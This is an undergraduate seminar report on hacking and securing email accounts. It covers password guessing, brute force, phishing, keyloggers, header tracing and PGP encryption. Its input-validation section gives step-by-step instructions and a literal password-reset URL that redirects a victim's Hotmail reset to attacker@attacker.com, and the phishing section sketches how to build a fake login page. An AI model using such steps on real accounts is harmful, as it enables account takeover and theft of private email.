Seminar Report On

Hacking and Securing E-Mail Accounts

For partial fulfillment of requirement of the degree of B.Tech in Computer Science (Session 2008-2012)

[Department of Computer Science] Submitted To Mr. Mukesh Kalla Submitted By Sudhir Pratap
VIII SEM CSE

MARWAR ENGINEERING COLLEGE & RESEARCH CENTER (Affiliated to Rajasthan Technical University, Kota)

MARWAR COLLEGE

ENGINEERING

& RESEARCH CENTRE (An affiliated college of Rajasthan Technical University, Kota)

Certificate
This is to certify that the seminar entitled Hacking and Securing EMail Account presented by Mr. Sudhir Pratap, in 8th semester of his is a bonafide work of his own, and submitted in partial fulfillment of the requirement for the award of Bachelors Degree in Computer Science and Engineering.

Guide: Mr. Mukesh Kalla

Acknowledgement
I take immense pleasure in thanking Mr. V. K. Bhansali (Director, MECRC, Jodhpur) for having permitted us to carry out this seminar work. We would also like to forward our sincere thanks to Mr. J. L. Kankariya (HOD, Computer Science Dept.) for his cooperation and helping us in earning this learning opportunity. I wish to express our deep sense of gratitude to Mr. Mukesh Kalla (CSE Dept.) for his able guidance and useful suggestions, which helped us in completing the seminar work, in time. Finally, yet importantly, we would like to express our heartfelt thanks to our beloved parents and teachers for their blessings and wishes for the successful completion of this seminar. Last, but not the least, I am also grateful to my friends for tirelessly and patiently pursuing me to complete this report without whose help completion of the Seminar report was the next thing to impossible.

Sudhir Pratap Singh Rathore

Abstract

Email is one of the most popular utilities of the Internet. Staying in touch with friends and relatives, closing business deals within minutes and forwarding mass emails to all addresses in the address book- are just a few common uses of email. Email has rapidly replaced snail mail in almost all domains and has become the preferred form of communication for most people. Unfortunately an email message is definitely not as harmless as it might seem at first glance. There are a lot of dangers, abuse and problems associated with the rapidly increasing popularity of email. Email has become ubiquitous, especially in the corporate world. Most businesses cannot survive without the use of email. In spite of the rapidly growing popularity of email as the preferred communication medium, very few people are actually aware of the numerous security risks involved. In the recent years, there has been an alarming increase in the number of email fraud cyber crime cases on the Internet. Hence, it has become extremely important for all businesses to take the necessary precautions to fight the menace of email fraud. Hacking email accounts, stealing sensitive data, copying the address book, intercepting data, virus infections, password attacks, spoofed messages, abusive emails, Trojan attacks and espionage are only some of the many concerns that have started affecting email users worldwide. Emails are also commonly being exploited by computer criminals to execute privacy and identity attacks on unsuspecting victims. Email Hacking-aims to educate and prepare email users against some of the most dangerous email related security loopholes, vulnerabilities and attacks.

Table of Contents

S.no. 1. 2. 3. 4. 5. 6. 7. Introduction Overview Tracing E-Mail

Topic

Page no. 6-8 9 10 11-18 19-24 25 26

Cracking E-Mail Account Securing E-Mail Conclusion Bibliography

INTRODUCTION

The process of attempting to gain, or successfully gaining, unauthorized access to computer resources for the purpose of mischievous or malicious use, modification, destruction or disclosure of those resources. The concept of hacking as a methodology to achieve some particular goal has the allusion of working at something by experimentation or empirical means, learning about the process under review or development by ad hoc mechanisms. This may have had an origin from the use of the term "v.t. to chop or cut roughly. e.i. to make rough cuts" as in the process of empirical development where numerous different routes are explored in a search for the most effective approach to a solution, but without necessarily having planned a prearranged ordering of search or necessarily a methodology for evaluation. To chance upon a solution through "hacking through a problem" is often as educational as structured learning, and thus it is not reasonable to approach a problem in a field which is devoid of structure and methodology by "hacking".

Hacker: A hacker is a person who is extremely interested in exploring the things and recondite workings of any computer system or networking system. They are very gifted programmers. One who programs enthusiastically or who programs rather than theorizing about programming.

Ethical Hacker: Ethical hackers refer to security professional who apply their hacking skills for Defensive purposes on behalf of its owners. One of the best ways to evaluate the intruder threat is to have an independent computer security professionals attempt to break their computer systems and those professionals are called ETHICAL HACKERS.

Types of Hacker:

Hackers can be broadly classified on the basis of why they are hacking system or why they are indulging hacking. There are mainly three types of hacker on this basis:

Black-Hat Hacker:

A black hat hackers or crackers are individuals with extraordinary Computing skills, resorting to malicious or destructive activities. That is black hat hackers use their knowledge and skill for their own personal gains probably by hurting others.

White-Hat Hacker:

White hat hackers are those individuals professing hacker skills and using them for defensive purposes.This means that the white hat hackers use their knowledge and skill for the good of others and for the common good.

Grey-Hat Hackers:

These are individuals who work both offensively and defensively at various times. We cannot predict their behavior. Sometimes they use their skills for the common good while in some other times he uses them for their personal gains.

Why do people hack: There is an on-going debate about the definition of the word hacker. A hacker can be anyone with a deep interest in computer-based technology; it does not necessarily define someone who wants to do harm. The term attacker can be used to describe a malicious hacker. Another term for an attacker is a black hat. Security analysts are often called white hats, and white-hat analysis is the use of hacking for defensive purposes. Attackers' motivations vary greatly. Some of the most notorious hackers are high school kids in their basements planted in front of their computers looking for ways to exploit computer systems. Other attackers are disgruntled employees seeking revenge on a company. And still other attacks are motivated by the sheer challenge of penetrating a well-secured system. Just for fun Hack other systems secretly Notify many people their thought Steal important information Destroy enemys computer network during the war.
Spite--Plainly stated, the cracker may dislike you. Perhaps he is a

disgruntled employee from your company. Perhaps you flamed him in a Usenet group. One common scenario is for a cracker to crack an ISP with which he once had an account. Sport--Perhaps you have been bragging about the security of your system, telling people it's impenetrable. Or worse, you own a brand-spanking-new system that the cracker has never dealt with before. These are challenges a cracker cannot resist. Profit--Someone pays a cracker to bring you down or to get your proprietary data. Politics--A small (but significant) percentage of crackers crack for political reasons. That is, they seek press coverage to highlight a particular issue.

Overview:

Most modern days Internet users use standard e-mail clients (like outlook Express, Microsoft outlook, opera etc.) to send and receive e-mail messages on internet. Such e-mail clients are not only very quick and easy to use, but also provide users a variety of useful features. E-mail clients make it very easy for one to turn a blind eye to the linear working of e-mail system. However, understanding how e-mail systems work is extremely important if one actually wants to be able to solve e-mail related threats. It is extremely important for Internet user to understand how e-mail travel o internet. Unless one become familiar with the working of e-mail systems, it is impossible to counter such threats. All e-mail communication on internet is governed by rules and regulation laid down by two different protocols: 1) Simple Mail Transfer Protocol (SMTP Port 25) 2) Post Office Protocol (POP Port 110) Basically, the e-mail system is quite analogous to that of snail mail. Each time an e-mail has to be sent, the sender connects to a local mail server (post office) and uses predefined SMTP commands to create and send the e-mail. This local mail server then uses the SMTP protocol to route the e-mail through several other interim mail servers, until the e-mail finally reaches the destination mail server (post office). The recipient of e-mail then connects to this destination post office server to download the received e-mail using predefined POP commands. The SMTP protocol is used to send the e-mail, while POP protocol is used to receive them.

10

Sender Outbox Source Mail Server Interim Mail Server Destination Mail Server Destination Inbox

11

Tracing E-mail

Each time one receives a cryptic e-mail, it is imperative that one follows the proper investigation process and tries to trace the source. One should follow the easy steps below and try to trace the source: 1) Open e-mail headers. 2) Identify the Internet Protocol (IP) address of the computer that was used to send the E-mail. 3) Trace the IP address to pinpoint the identity of the culprit. Once the full e-mail headers of suspect e-mail have been opened, one should then try to obtain the IP address of source system that was used to send the email. One of most common technique of finding the source IP address is : X-Originating-IP: 210.62.15.92

Once the source IP address of e-mail under scrutiny has been found, one should then try to trace it to gather as much information about it as possible. There are number of different techniques that can be used to gather information or trace an IP address on Internet, namely:

Reverse DNS Lookup WHOIS

12

Cracking E-Mail Accounts

E-Mail hacking is one of the most common attacks on the Internet. Almost all computer security enthusiasts- irrespective of their expertise level- are sure to have indulged in e-mail account cracking at some point of time or the other. As more and more people start depending upon e-mails for both official and personal subsistence, the threat of e-mail account cracking is only going to increase. The hugely critical role played by e-mail in todays world makes email cracking all the more attractive from a criminals point of view.

There are few different techniques that are commonly used by attackers:

Password Guessing Forgot Password Attacks Brute Force Password Cracking Phishing Attack Input Validation Attack Social Engineering Key logging

13

Password Guessing:

Low Threat Level Easily executed Very common, but not very effective

Password guessing is one of the most commonly used password cracking techniques. In this attack, attacker first gathers as much personal information about victim as possible and then simply tries his luck by entering different combinations at the password prompt.

Forgot Password Attack:

Mid Threat Level Easily executed Not very effective

It can be labeled as extension to the password guessing attack. All e-mail service providers have an option that allows user to reset or retrieve their e-mail account password by answering a few predefined questions. Ideally, e-mail service providers should ask users to enter only personal information to retrieve or reset the password. An attacker can easily find out such information without much trouble.

14

Brute Force Password Attacks:

High Threat Level Very tedious and slow Very effective

In this attack, an automatic tool or script tries all possible combinations of the available keyboards keys as the victims password. Such a hit and trial method of trying out all available permutations and combinations means that irrespective of victims password, it will sooner or later definitely be cracked. Due to extremely high number of possible combinations of keystrokes, brute forcing can sometimes take an extremely long time to reach the correct password. The success and speed of this technique largely depends upon the strength of victims password.

15

Phishing:

Very high threat level Easily executed More effective

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures. A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant of fishing, probably influenced by phreaking, and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.

16

Phishing attack can be executed by following steps:

1) Attacker creates a fake screen that will be used to fool the

victim. Usually such fake phishing screens can easily be created by editing the HTML code from the respective e-mail service providers website.
2) Once the attacker has created the fake phishing screen, it has to

be sent to victim. Most common techniques used to send fake screen to the victim are through file attachment, HTML embedded e-mails, and active-X enabled e-mails, HTA application, physical access and many others.
3) Typically, as soon as victim opens the fake screen and put its

authentic e-mail accounts information. As soon as victim clicks on LOGIN button, this sensitive account information gets sent to attacker.

17

Input Validation Attacks:

Very high threat level Easily executed, not so common Very effective

This attack allows an attacker to illegitimately reset the password of any victim without any proper authorization. This input validation loophole could easily be exploited to change the existing password of user without any kind of information gathering and even answering any secret hint question.

This attack can easily be executed in following steps:

1) Open internet browser. 2) Copy and paste under mentioned URL into address bar of the browser:

http://register.passport.net e-mailpwdreset.srf?lc=1033&em= victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

Simply press enter and an e-mail will be sent to attackers e-mail address, will allow attacker to change victims password without entering any authorization.

18

Social Engineering:
Mid threat level Ease of execution varies Effectiveness varies

Social engineering is the art of talking people in a persuasive and smooth manner in order to win their trust and then being able to make them reveal certain important bits of private information. An extremely large number of password cracking attacks on internet are executed using social engineering techniques.

Types of Social Engineering Attacks: Impersonation Intimidation Real-life Social Engineering Fake prompts

19

Keylogging:

Key logging as the name suggests is the way of recording every key pressed on a keyboard. It is tracking the key strokes in a manner that the users does not come to know or are unaware that they are being monitored . Key logging can be done both by the means of software or hardware . Software based keylogger needs to be installed on the victims machine to monitor the strokes and hardware based needs to be attached to the CPU . A keylogger sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer's keyboard. Keylogger can also record your passwords of victim these are also called spy software. Not even password we can also record all keystrokes of victim. Types of Keylogger: 1) Hardware keylogger 2) Software keylogger Hardware Keylogger: They can be connected directly to the keyboard's cable. The spy does not need actual access to the computer nor to turn it on, needs he just to be physically there. Anyone with access to your computer may install such devices secretly and it's very hard to notice them. The main downside is that the spy can be caught if anyone finds out, for he needs to be physically there to both install and retrieve the keylogger. Software Keylogger: The most common type of keyloggers. If anyone has physical access to your computer, then it's a "piece of cake" to install a keylogger. That's the easier way, for if he is knowledgeable, he can also disable a given antivirus for that keylogger (so it doesn't interfere). Remote keylogging is very popular despite the numerous anti-virus programs out there that block them.

20

Securing E-Mail

Basic terminology that a user can use to not let hacker easily hack your E-mail account:

Password should not be too short. Try to use both uppercase and lowercase. Try to use combination of alphabets, numbers and special characters. Keep changing your password. Do not use same password for all your accounts. Use a secure internet connection.

Always use text.

Use additional multi-layered defenses.

Encrypt sensitive E-Mails.

21

Cryptography:

Until modern times cryptography referred almost exclusively to encryption, which is the process of converting ordinary information (called plaintext) into unintelligible gibberish (called cipher text). Decryption is the reverse, in other words, moving from the unintelligible cipher text back to plaintext. A cipher (or cipher) is a pair of algorithms that create the encryption and the reversing decryption. The detailed operation of a cipher is controlled both by the algorithm and in each instance by a "key". This is a secret parameter (ideally known only to the communicants) for a specific message exchange context. A "cryptosystem" is the ordered list of elements of finite possible plaintexts, finite possible cipher texts, finite possible keys, and the encryption and decryption algorithms which correspond to each key. Keys are important, as ciphers without variable keys can be trivially broken with only the knowledge of the cipher used and are therefore useless (or even counter-productive) for most purposes.

22

Encryption

In cryptography, encryption is the process of transforming information (referred to as plaintext) using an algorithm (called a cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key. The result of the process is encrypted information (in cryptography, referred to as cipher text). The reverse process, i.e., to make the encrypted information readable again, is referred to as decryption (i.e., to make it unencrypted). In many contexts, the word encryption may also implicitly refer to the reverse process, decryption e.g. software for encryption can typically also perform decryption. Encryption has long been used by militaries and governments to facilitate secret communication. It is now commonly used in protecting information within many kinds of civilian systems. For example, the Computer Security Institute reported that in 2007, 71% of companies surveyed utilized encryption for some of their data in transit, and 53% utilized encryption for some of their data in storage. Encryption can be used to protect data "at rest", such as files on computers and storage devices (e.g. USB flash drives). In recent years there have been numerous reports of confidential data such as customers' personal records being exposed through loss or theft of laptops or backup drives.

23

Background Information on Encryption:

Most modern day strong encryption algorithms rely on two different critical features to successfully encrypt data: Mathematical Algorithm Keys

The mathematical algorithm being used by an encryption system is nothing but a set of mathematical formulae that converts plaintext data into cipher text. However mathematical algorithms remain quite easy to reverse engineer and are also easily available on internet for free download. Thus modern day encryption systems not only rely on mathematical algorithms but also use keys to encrypt plaintext into cipher text.

Concept of Keys:

Keys are unique to each user and are randomly generated by user himself. This means that same piece of plaintext data when encrypted using the same mathematical algorithm, but with different keys will generate two different sets of cipher text. Hence, an attacker can decrypt cipher text into plaintext only with the help of correct key. The weakness of encryption system can be resolved with the help of a set of two different keys, as follows: Private Key Public key

24

Each user is assigned both private key (used for decryption) and a public key (used for encryption). One makes his public key available to all users on interne, while keeping his private key a closely guarded secret. Once your public key has been published on the internet, absolutely anyone can use it to send you encrypted e-mails. However, e-mails encrypted using your public key can only be decrypted with the help of your private key. Hence, nobody can intercept and decrypt an encrypted e-mail using your public key, without also having access to your private key. Such a system of encryption and decryption using corresponding public and private keys, not only ensures that absolutely anyone can send encrypted e-mails to the recipient, but also makes sure that only an authorized recipient can decrypt and view e-mails. Most importantly, such a system solves the problem of securely transferring keys over the internet. This process can be recapitulated in the following manner:

Encryption: PLAINTEXT* (Algorithm + public key) = CIPHER TEXT Decryption: CIPHER TEXT* (Algorithm + private key) = PLAINTEXT

25

Pretty Good Privacy:

Pretty Good Privacy (PGP) is a data encryption and decryption computer program that provides cryptographic privacy and authentication for data communication. PGP is often used for signing, encrypting and decrypting texts, E-mails, files, directories and whole disk partitions to increase the security of email communications. It was created by Phil Zimmermann in 1991. PGP and similar products follow the OpenPGP standard (RFC 4880) for encrypting and decrypting data. PGP cryptography system is not only very safe but is also very easy to implement and use. The working of PGP system can be explained in the following:
Encryption

Decryption

26

Conclusion

Hacking is a very broad discipline, which covers a wide range of topics. The complexity of hacking allows us only to scratch the surface of it. With increases in computer technology, as well as increases in integration of computers into everyday life, it is evident that there is a place for hackers in the future but finding where they will stand is something that only time can tell. Hacking caused an international problem when the United States government thought about using it as a weapon to derail Yugoslav war forces. No international solution can be proposed because the nations of the world do not have the same ideas, laws and punishments governing hacking. Hacking has the potential to disrupt the economy, create international tension and ruin the lives of ordinary citizens worldwide. The very technology that brought the world together (the computer), is now the central focus in a plague tearing the world apart.

27

Bibliography

Books: 1. Unofficial Guide to Ethical Hacking by Ankit Fadia 2. Network Security by Ankit Fadia 3. E-mail hacking by Ankit Fadia

WEBSITES: www.askjeeves.com www.cert.org www.hackingtruth.com

28